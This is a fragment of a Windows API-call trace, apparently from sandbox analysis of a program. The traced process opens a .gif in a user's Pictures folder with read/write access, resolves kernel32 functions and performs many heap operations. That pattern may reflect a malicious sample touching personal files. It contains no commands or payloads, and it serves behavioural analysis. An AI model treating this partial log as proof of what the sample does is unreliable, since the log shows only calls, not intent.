WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif", cchWideChar=67, lpMultiByteStr=0x9aa548, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif", lpUsedDefaultChar=0x0) returned 67 [0190.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.546] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\qmjeo8.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0190.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0190.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x86) returned 0x907778 [0190.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x907778, cchWideChar=67 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif") returned 67 [0190.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0190.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0190.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0190.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0190.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0190.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0190.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0190.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0190.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0190.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0190.549] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0190.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0190.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.551] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0190.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0190.551] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0190.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0190.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0190.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.552] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.553] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0190.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba540, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0190.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.553] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0190.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0190.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0190.553] CloseHandle (hObject=0x160) returned 1 [0190.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0190.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0190.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.554] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0190.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0190.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.555] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0190.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0190.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.555] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 